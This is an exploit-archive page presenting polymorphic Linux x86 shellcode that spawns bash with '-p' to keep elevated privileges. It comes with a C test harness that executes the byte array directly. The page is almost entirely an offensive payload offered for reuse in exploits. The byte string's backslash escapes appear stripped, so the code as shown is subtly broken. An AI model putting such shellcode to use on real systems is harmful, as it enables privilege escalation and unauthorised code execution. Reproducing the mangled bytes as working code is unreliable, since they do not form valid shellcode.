Linux x86 - polymorphic execve("/bin/bash","-p",NULL)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
# Published : 2010-05-05
# Author : Jonathan Salwan
# Previous Title : WinXP SP2 Fr Download and Exec Shellcode
# Next Title : Linux x86 - execve("/bin/bash","-p",NULL) - 33 bytes

/*

Title: 	Linux x86 - polymorphic execve("/bin/bash", ["/bin/bash", "-p"], NULL) - 57 bytes
Author:	Jonathan Salwan
Mail:	submit@shell-storm.org
Web:	http://www.shell-storm.org

!Database of Shellcodes http://www.shell-storm.org/shellcode/


sh sets (euid, egid) to (uid, gid) if -p not supplied and uid < 100
Read more: http://www.faqs.org/faqs/unix-faq/shell/bash/#ixzz0mzPmJC49

Based in http://www.shell-storm.org/shellcode/files/shellcode-606.php
*/

#include <stdio.h>

char shellcode[] = "xebx11x5ex31xc9xb1x21x80"
		   "x6cx0exffx01x80xe9x01x75"
  		   "xf6xebx05xe8xeaxffxffxff"
		   "x6bx0cx59x9ax53x67x69x2e"
		   "x71x8axe2x53x6bx69x69x30"
		   "x63x62x74x69x30x63x6ax6f"
		   "x8axe4x53x52x54x8axe2xce"
		   "x81";

int main(int argc, char *argv[])
{
       	fprintf(stdout,"Length: %dn",strlen(shellcode));
	(*(void(*)()) shellcode)();       
}